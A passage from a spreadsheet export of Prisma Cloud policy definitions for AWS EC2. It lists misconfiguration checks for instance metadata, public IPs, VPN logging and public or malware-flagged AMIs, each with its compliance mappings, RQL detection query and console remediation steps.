https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-IMDS-existing-instances.html
To delete the reported Auto Scaling group launch configuration follow the steps below:
1. Open the Amazon EC2 console.
2. On the left navigation pane, under 'Auto Scaling', choose 'Auto Scaling Groups' and Choose 'Launch configurations' near the top of the page.
3. Select the reported launch configuration and choose Actions, then click 'Delete launch configuration'.
4. Click on the 'Delete' button to delete the autoscaling group launch configuration.
NOTE: Ensure adequate precautions before you enforce the use of IMDSv2, as applications or agents that use IMDSv1 for instance metadata access will break.</t>
        </is>
      </c>
      <c r="Y1624" t="inlineStr"/>
      <c r="Z1624" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ec2-autoscaling-launch-configuration' AND json.rule = (metadataOptions.httpEndpoint does not exist) or (metadataOptions.httpEndpoint equals "enabled" and metadataOptions.httpTokens equals "optional") as X; config from cloud.resource where api.name = 'aws-describe-auto-scaling-groups' as Y; filter ' $.X.launchConfigurationName equal ignore case $.Y.launchConfigurationName'; show X;</t>
        </is>
      </c>
      <c r="AA1624" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB1624" t="inlineStr">
        <is>
          <t>2024-11-19 10:55:31</t>
        </is>
      </c>
      <c r="AC1624" t="inlineStr">
        <is>
          <t>PC-AWS-ASG-1047</t>
        </is>
      </c>
      <c r="AD1624" t="b">
        <v>1</v>
      </c>
      <c r="AE1624" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1624" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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4" t="inlineStr">
        <is>
          <t>d5b23289-aedc-4dc7-ad24-211ac900eae5</t>
        </is>
      </c>
      <c r="AI1624" t="inlineStr">
        <is>
          <t>bf844eb1-956e-4516-935a-d4a46b590c1d</t>
        </is>
      </c>
      <c r="AJ1624" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1624" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1625">
      <c r="A1625" t="inlineStr">
        <is>
          <t>HITRUST CSF v.11.2.0, TX-RAMP Level 2, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs)</t>
        </is>
      </c>
      <c r="B1625" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1625" s="2" t="inlineStr"/>
      <c r="D1625" t="inlineStr"/>
      <c r="E1625" t="inlineStr"/>
      <c r="F1625" t="inlineStr"/>
      <c r="G1625" t="b">
        <v>1</v>
      </c>
      <c r="H16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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1625" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1625" t="inlineStr">
        <is>
          <t>AWS Auto Scaling group launch configuration has public IP address assignment enabled</t>
        </is>
      </c>
      <c r="L1625" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1625" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1625" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1625" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1625" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1625" t="inlineStr">
        <is>
          <t>Principle 6</t>
        </is>
      </c>
      <c r="R1625" t="inlineStr">
        <is>
          <t>6.2.3</t>
        </is>
      </c>
      <c r="S1625" t="inlineStr"/>
      <c r="T1625" t="b">
        <v>0</v>
      </c>
      <c r="U1625" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1625" t="inlineStr">
        <is>
          <t>aws-ec2-autoscaling-launch-configuration</t>
        </is>
      </c>
      <c r="W1625" t="inlineStr">
        <is>
          <t>This policy identifies the autoscaling group launch configuration that is configured to assign a public IP address. Auto Scaling groups assign a public IP address to the group's ec2 instances if its associated launch configuration is configured to assign a public IP address. Amazon EC2 instances should only be accessible from behind a load balancer instead of being directly exposed to the internet. It is recommended that the Amazon EC2 instances in an autoscaling group launch configuration do not have an associated public IP address except for limited edge cases.</t>
        </is>
      </c>
      <c r="X1625" t="inlineStr">
        <is>
          <t>An Auto Scaling group is associated with one launch configuration at a time. You cannot modify a launch configuration after you have created it. To change the launch configuration for an Auto Scaling group, You need to use an existing launch configuration as the basis for a new launch configuration first. Then, update the Auto Scaling group to use the new launch configuration before you delete the reported Auto Scaling group configuration.
To update the Auto Scaling group to use the new launch configuration follow the steps below:
1. Open the Amazon EC2 console.
2. On the left navigation pane, under 'Auto Scaling', choose 'Auto Scaling Groups' and Choose 'Launch configurations' near the top of the page.
3. Select the reported launch configuration and choose Actions, then click 'Copy launch configuration'. This sets up a new launch configuration with the same options as the original, but with 'Copy' added to the name.
4. On the 'Create launch configuration' page, expand 'Advanced details' under 'Additional Configuration - optional'.
5. Under the IP address type, choose 'Do not assign a public IP address to any instances'.
6. When you have finished, click on the 'Create launch configuration' button at the bottom of the page.
7. On the navigation pane, under Auto Scaling, choose Auto Scaling Groups.
8. Select the check box next to the Auto Scaling group.
9. A split pane opens up at the bottom part of the page, showing information about the group that's selected.
10. On the Details tab, click on the 'Edit' button adjacent to the 'Launch configuration' option.
11. Under the 'Launch configuration' dropdown, select the newly created launch configuration.
12. When you have finished changing your launch configuration, click on the 'Update' button at the bottom of the page.
After you change the launch configuration for an Auto Scaling group, any new instances are launched with the new configuration options. Existing instances are not affected. To update existing instances, either terminate them so that they are replaced by your Auto Scaling group or allow automatic scaling to gradually replace older instances with newer instances based on your termination policies.
To delete the reported Auto Scaling group launch configuration follow the steps below:
1. Open the Amazon EC2 console.
2. On the left navigation pane, under 'Auto Scaling', choose 'Auto Scaling Groups' and Choose 'Launch configurations' near the top of the page.
3. Select the reported launch configuration and choose Actions, then click 'Delete launch configuration'.
4. Click on the 'Delete' button to delete the autoscaling group launch configuration.</t>
        </is>
      </c>
      <c r="Y1625" t="inlineStr"/>
      <c r="Z1625" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ec2-autoscaling-launch-configuration' AND json.rule = associatePublicIpAddress exists and associatePublicIpAddress is true</t>
        </is>
      </c>
      <c r="AA1625" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1625" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1625" t="inlineStr">
        <is>
          <t>PC-AWS-ASG-1055</t>
        </is>
      </c>
      <c r="AD1625" t="b">
        <v>1</v>
      </c>
      <c r="AE1625" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1625" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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5" t="inlineStr">
        <is>
          <t>8336772f-d32c-4a8f-9c72-0ae7dcb637e9</t>
        </is>
      </c>
      <c r="AI1625" t="inlineStr">
        <is>
          <t>eb49d241-f20e-4a8b-b1b8-564b7e8e5493</t>
        </is>
      </c>
      <c r="AJ1625" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1625" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1626">
      <c r="A1626" t="inlineStr">
        <is>
          <t>ITSG-33, NYDFS 23 CRR-NY 500.0, GDPR, Microsoft Cloud Security Benchmark v1, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), TX-RAMP Level 1, TX-RAMP Level 1, TX-RAMP Level 2, CIS Controls v8.1, Insurance Regulatory And Development Authority Of India, TX-RAMP Level 2, SOC 2, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, DORA</t>
        </is>
      </c>
      <c r="B1626" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1626" s="2" t="inlineStr"/>
      <c r="D1626" t="inlineStr"/>
      <c r="E1626" t="inlineStr"/>
      <c r="F1626" t="inlineStr"/>
      <c r="G1626" t="b">
        <v>1</v>
      </c>
      <c r="H16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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1626" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1626" t="inlineStr">
        <is>
          <t>AWS EC2 Client VPN endpoints client connection logging disabled</t>
        </is>
      </c>
      <c r="L1626" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1626" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1626" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1626" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1626" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1626" t="inlineStr">
        <is>
          <t>Chapter II</t>
        </is>
      </c>
      <c r="R1626" t="inlineStr">
        <is>
          <t>Article 10, Detection</t>
        </is>
      </c>
      <c r="S1626" t="inlineStr"/>
      <c r="T1626" t="b">
        <v>0</v>
      </c>
      <c r="U1626" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1626" t="inlineStr">
        <is>
          <t>aws-ec2-client-vpn-endpoint</t>
        </is>
      </c>
      <c r="W1626" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 client VPN endpoints with client connection logging disabled.
AWS Client VPN endpoints enable remote clients to securely connect to resources in the Virtual Private Cloud (VPC). Connection logs enable you to track user behaviour on the VPN endpoint and gain visibility.
It is recommended to enable connection logging for AWS EC2 client VPN endpoints.</t>
        </is>
      </c>
      <c r="X1626" t="inlineStr">
        <is>
          <t>To enable connection logging for a new Client VPN endpoint, follow these steps:
1. Sign into the AWS console and navigate to the Amazon VPC console
2. In the navigation pane, choose 'Client VPN Endpoints'
3. Select the 'Client VPN endpoint', choose 'Actions', and then choose 'Modify Client VPN endpoint'
4. Under 'Connection logging', turn on 'Enable log details on client connections'
5. For 'CloudWatch Logs log group name', choose the name of the CloudWatch Logs log group
6. (Optional) For 'CloudWatch Logs log stream name', choose the name of the CloudWatch Logs log stream
7. Choose 'Modify Client VPN endpoint'</t>
        </is>
      </c>
      <c r="Y1626" t="inlineStr"/>
      <c r="Z1626" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-ec2-client-vpn-endpoint' AND json.rule = status.code equal ignore case available and connectionLogOptions.Enabled is false</t>
        </is>
      </c>
      <c r="AA1626" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1626" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1626" t="inlineStr">
        <is>
          <t>PC-AWS-VPC-1163</t>
        </is>
      </c>
      <c r="AD1626" t="b">
        <v>1</v>
      </c>
      <c r="AE1626" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1626" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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6" t="inlineStr">
        <is>
          <t>6c9ffb43-fa72-4e85-9b22-86e4ed272a5f</t>
        </is>
      </c>
      <c r="AI1626" t="inlineStr">
        <is>
          <t>4b7950e1-1b54-43b0-848d-d1134beebc54</t>
        </is>
      </c>
      <c r="AJ1626" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1626" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1627">
      <c r="A1627" t="inlineStr">
        <is>
          <t>test compliace 4 matias</t>
        </is>
      </c>
      <c r="B1627" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1627" s="2" t="inlineStr"/>
      <c r="D1627" t="inlineStr"/>
      <c r="E1627" t="inlineStr"/>
      <c r="F1627" t="inlineStr"/>
      <c r="G1627" t="b">
        <v>1</v>
      </c>
      <c r="H16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27" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1627" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1627" t="inlineStr">
        <is>
          <t>Custom policy for Matias custom Standard</t>
        </is>
      </c>
      <c r="L1627" t="inlineStr"/>
      <c r="M1627" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1627" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1627" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1627" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1627" t="inlineStr">
        <is>
          <t>1</t>
        </is>
      </c>
      <c r="R1627" t="inlineStr">
        <is>
          <t>1.1</t>
        </is>
      </c>
      <c r="S1627" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="T1627" t="b">
        <v>0</v>
      </c>
      <c r="U1627" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1627" t="inlineStr">
        <is>
          <t>aws-ec2-describe-images</t>
        </is>
      </c>
      <c r="W1627" t="inlineStr">
        <is>
          <t>Cloning a policy to simplify deployment</t>
        </is>
      </c>
      <c r="X1627" t="inlineStr"/>
      <c r="Y1627" t="inlineStr"/>
      <c r="Z1627" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-ec2-describe-images' AND json.rule = image.public is true and image.shared is false and image.imageOwnerAlias does not exist</t>
        </is>
      </c>
      <c r="AA1627" t="inlineStr">
        <is>
          <t>Matias Keib</t>
        </is>
      </c>
      <c r="AB1627" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1627" t="inlineStr"/>
      <c r="AD1627" t="b">
        <v>0</v>
      </c>
      <c r="AE1627" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1627" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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27" t="inlineStr">
        <is>
          <t>b54d1f0b-369e-4790-a130-5e517f9883a0</t>
        </is>
      </c>
      <c r="AI1627" t="inlineStr">
        <is>
          <t>09831590-283a-4e7b-a7b9-6e3dc8f50fdc</t>
        </is>
      </c>
      <c r="AJ1627" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1627" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1628">
      <c r="A1628" t="inlineStr">
        <is>
          <t>TX-RAMP Level 2, kashan ACSC Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Secure Controls Framework (SCF) - 2022.2.1, MITRE ATT&amp;CK v12, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Matt's ATT&amp;ACK, kashan ACSC Information Security Manual (ISM), HITRUST CSF v.11.2.0, MLPS 2.0 (Level 2), HITRUST CSF v.9.6.0, MAS TRM 2021, MAS TRM 2021, RBI Baseline Cyber Security and Resilience Requirements, Copy of CIS Controls v8, ITSG-33, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2024.2, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, CIS Controls v8, Insurance Regulatory And Development Authority Of India, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, CHC HITRUST CSF v.9.6.0, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, CHC HITRUST CSF v.9.6.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ACSC Information Security Manual (ISM), Microsoft Cloud Security Benchmark v1, kfirdaus AWS Account-CS, NIST CSF v2.0, Copy of ACSC Information Security Manual (ISM)-clone, CRI Profile v2.0, TX-RAMP Level 1, NIST CSF v2.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MITRE ATT&amp;CK v10.0 [Deprecated], kfirdaus AWS Account-CS, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), CIS Controls v8.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, HITRUST CSF v.9.6.0, Sarbanes Oxley Act (SOX), CIS Controls v7.1, MLPS 2.0 (Level 2), DORA</t>
        </is>
      </c>
      <c r="B1628" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1628" s="2" t="inlineStr"/>
      <c r="D1628" t="inlineStr"/>
      <c r="E1628" t="inlineStr"/>
      <c r="F1628" t="inlineStr"/>
      <c r="G1628" t="b">
        <v>1</v>
      </c>
      <c r="H16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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1628" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1628" t="inlineStr">
        <is>
          <t>AWS Amazon Machine Image (AMI) infected with mining malware</t>
        </is>
      </c>
      <c r="L1628" t="inlineStr">
        <is>
          <t>MALWARE</t>
        </is>
      </c>
      <c r="M1628" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1628" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1628" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1628" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1628" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R1628" t="inlineStr">
        <is>
          <t>ISM-1628</t>
        </is>
      </c>
      <c r="S1628" t="inlineStr"/>
      <c r="T1628" t="b">
        <v>0</v>
      </c>
      <c r="U1628" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1628" t="inlineStr">
        <is>
          <t>aws-ec2-describe-images</t>
        </is>
      </c>
      <c r="W1628" t="inlineStr">
        <is>
          <t>This policy identifies Amazon Machine Images (AMIs) that are infected with mining malware. As per research, AWS Community AMI Windows 2008 hosted by an unverified vendor containing malicious code running an unidentified crypto (Monero) miner. It is recommended to delete such AMIs to protect from malicious activity and attack blast.</t>
        </is>
      </c>
      <c r="X1628" t="inlineStr">
        <is>
          <t>To delete reported AMI follow below mentioned URL:
https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/deregister-ami.html</t>
        </is>
      </c>
      <c r="Y1628" t="inlineStr"/>
      <c r="Z1628" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name='aws-ec2-describe-images' AND json.rule = image.platform contains windows and image.imageId contains ami-1e542176</t>
        </is>
      </c>
      <c r="AA1628" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1628" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1628" t="inlineStr">
        <is>
          <t>PC-AWS-EC2-711</t>
        </is>
      </c>
      <c r="AD1628" t="b">
        <v>1</v>
      </c>
      <c r="AE1628" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1628" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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8" t="inlineStr">
        <is>
          <t>aee32861-a98a-4937-83cf-9e94bd509575</t>
        </is>
      </c>
      <c r="AI1628" t="inlineStr">
        <is>
          <t>0edf153f-a10f-4b86-8233-f342f728f9c6</t>
        </is>
      </c>
      <c r="AJ1628" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1628" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1629">
      <c r="A1629" t="inlineStr">
        <is>
          <t>ISO 27001:2013, CSA CCM v3.0.1, HITRUST CSF v9.3 [Deprecated], kfirdaus AWS Account-CS, Brazilian Data Protection Law (LGPD), ISO/IEC 27001:2022, GDPR, APRA (CPS 234) Information Security, CSA CCM v3.0.1, Copy of ACSC Information Security Manual (ISM)-clone, NIST 800-53 Rev 5, MLPS 2.0, HIPAA, NIST CSF, NIST CSF v2.0, NIST CSF, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, NYDFS 23 CRR-NY 500.0, ISO 27002:2022, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, HITRUST CSF v9.3 [Deprecated], NIST 800-171 Rev1, HITRUST CSF v9.3 [Deprecated], Copy of ACSC Information Security Manual (ISM)-clone, HITRUST CSF v9.3 [Deprecated], MITRE ATT&amp;CK v8.2 [Deprecated], HITRUST v.9.4.2 [Deprecated], GDPR, jbrox - GDPR, TX-RAMP Level 2, APRA (CPS 234) Information Security, ACSC Information Security Manual (ISM), ISO/IEC 27001:2022, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), HITRUST CSF v9.3 [Deprecated], Secure Controls Framework (SCF) - 2022.2.1, kashan ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v10.0 [Deprecated], HITRUST CSF v9.3 [Deprecated], Copy of ACSC Information Security Manual (ISM)-clone, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), HITRUST CSF v.11.2.0, kashan ACSC Information Security Manual (ISM), NIST 800-53 Rev 5, ITSG-33, ISO 27001:2013, TX-RAMP Level 2, kfirdaus AWS Account-CS, MITRE ATT&amp;CK v12, CSA CCM v3.0.1, SOC 2, ITSG-33, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 2, CDC NIST 800-53 Rev4, NIST 800-53 Rev4, NIST 800-53 Rev 5, CyberSecurity Law of the People's Republic of China, Insurance Regulatory And Development Authority Of India, Telecommunications Security Act - TSA, SOC 2, ISO 27001:2013, NIST 800-53 Rev4, Matt's ATT&amp;ACK, TX-RAMP Level 1, NIST SP 800-171 Revision 3, HITRUST CSF v9.3 [Deprecated], CDC NIST 800-53 Rev4, PCI DSS v4.0, NIST CSF, Copy of ACSC Information Security Manual (ISM)-clone, NIST SP 800-171 Revision 3, ITSG-33, MLPS 2.0 (Level 2), Risk Management in Technology (RMiT), CIS Controls v8, NIST 800-171 Rev1, Brazilian Data Protection Law (LGPD), CyberSecurity Law of the People's Republic of China, MITRE ATT&amp;CK v6.3 [Deprecated], SOC 2, kfirdaus AWS Account-CS, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NIST CSF, jbrox - GDPR, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, SOC 2, ISO/IEC 27001:2022, NIST 800-53 Rev4, MLPS 2.0 (Level 3), HITRUST CSF v9.3 [Deprecated], Secure Controls Framework (SCF) - 2024.2, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Sarbanes Oxley Act (SOX), ISO 27001:2013, APRA (CPS 234) Information Security, kashan ACSC Information Security Manual (ISM), CDC NIST 800-53 Rev4, CIS Controls v7.1, CyberSecurity Law of the People's Republic of China, CSA CCM v3.0.1, Secure Controls Framework (SCF) - 2022.2.1, ITSG-33, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Australian Energy Sector Cyber Security Framework (AESCSF), CHC HITRUST CSF v.9.6.0, NIST CSF, HITRUST v.9.4.2 [Deprecated], PIPEDA, ISO 27002:2022, Copy of CIS Controls v8, NIST SP 800-172, SOC 2, PCI DSS v3.2.1, HITRUST CSF v.9.6.0, kashan ACSC Information Security Manual (ISM), CSA CCM v3.0.1, MAS TRM 2021, CCPA 2018, ACSC Information Security Manual (ISM), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), ACSC Information Security Manual (ISM), NIST 800-171 Rev1, NIST CSF, TX-RAMP Level 2, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), HITRUST CSF v9.3 [Deprecated], ACSC Information Security Manual (ISM), CHC HITRUST CSF v.9.6.0, kfirdaus AWS Account-CS, NIST 800-53 Rev 5, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CSA CCM v3.0.1, HIPAA, HIPAA, NIST 800-171 Rev1, HITRUST CSF v.9.6.0, PCI DSS v3.2.1, MITRE ATT&amp;CK v6.3 [Deprecated], NIST SP 800-171 Revision 2</t>
        </is>
      </c>
      <c r="B1629" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1629" s="2" t="inlineStr"/>
      <c r="D1629" t="inlineStr"/>
      <c r="E1629" t="inlineStr"/>
      <c r="F1629" t="inlineStr"/>
      <c r="G1629" t="b">
        <v>1</v>
      </c>
      <c r="H16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29" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1629" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1629" t="inlineStr">
        <is>
          <t>AWS Amazon Machine Image (AMI) is publicly accessible</t>
        </is>
      </c>
      <c r="L1629" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1629" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1629" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1629" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1629" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1629" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R1629" t="inlineStr">
        <is>
          <t>ISM-0854</t>
        </is>
      </c>
      <c r="S1629" t="inlineStr">
        <is>
          <t>Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1629" t="b">
        <v>1</v>
      </c>
      <c r="U1629" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1629" t="inlineStr">
        <is>
          <t>aws-ec2-describe-images</t>
        </is>
      </c>
      <c r="W1629" t="inlineStr">
        <is>
          <t>This policy identifies AWS AMIs which are owned by the AWS account and are accessible to the public. Amazon Machine Image (AMI) provides information to launch an instance in the cloud. The AMIs may contain proprietary customer information and should be accessible only to authorized internal users.</t>
        </is>
      </c>
      <c r="X1629" t="inlineStr">
        <is>
          <t>1. Login to the AWS Console and navigate to 'EC2' service.
2. In the navigation pane, choose AMIs.
3. Select your AMI from the list, and then choose Actions, Modify Image Permissions.
4. Choose Private and choose Save.</t>
        </is>
      </c>
      <c r="Y1629" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'ec2:ModifyImageAttribute' permission. Successful execution will make this AMI's access to private. This will ensure that only Owner has full privileges.",
'impact': 'make this AMI private',
'cliScriptTemplate': 'aws ec2 --region $region modify-image-attribute --image-id $resourceId --launch-permission "\\"Remove\\": [\\"Group\\":\\"all\\"]"'</t>
        </is>
      </c>
      <c r="Z1629" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-ec2-describe-images' AND json.rule = image.public is true and image.shared is false and image.imageOwnerAlias does not exist</t>
        </is>
      </c>
      <c r="AA1629" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1629" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1629" t="inlineStr">
        <is>
          <t>PC-AWS-EC2-35</t>
        </is>
      </c>
      <c r="AD1629" t="b">
        <v>1</v>
      </c>
      <c r="AE1629" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1629" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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29" t="inlineStr">
        <is>
          <t>81a2200a-c63e-4860-85a0-b54eaa581135</t>
        </is>
      </c>
      <c r="AI1629" t="inlineStr">
        <is>
          <t>81a2200a-c63e-4860-85a0-b54eaa581135</t>
        </is>
      </c>
      <c r="AJ1629" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1629" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1630">
      <c r="A1630" t="inlineStr"/>
      <c r="B1630" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1630" s="2" t="inlineStr"/>
      <c r="D1630" t="inlineStr"/>
      <c r="E1630" t="inlineStr"/>
      <c r="F1630" t="inlineStr"/>
      <c r="G1630" t="b">
        <v>0</v>
      </c>
      <c r="H16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 testrule, testrule2</t>
        </is>
      </c>
      <c r="I1630" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1630" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1630" t="inlineStr">
        <is>
          <t>Mark Davis Harish Saved Search Test 3082024</t>
        </is>
      </c>
      <c r="L1630" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1630" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1630" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1630" t="inlineStr">
        <is>
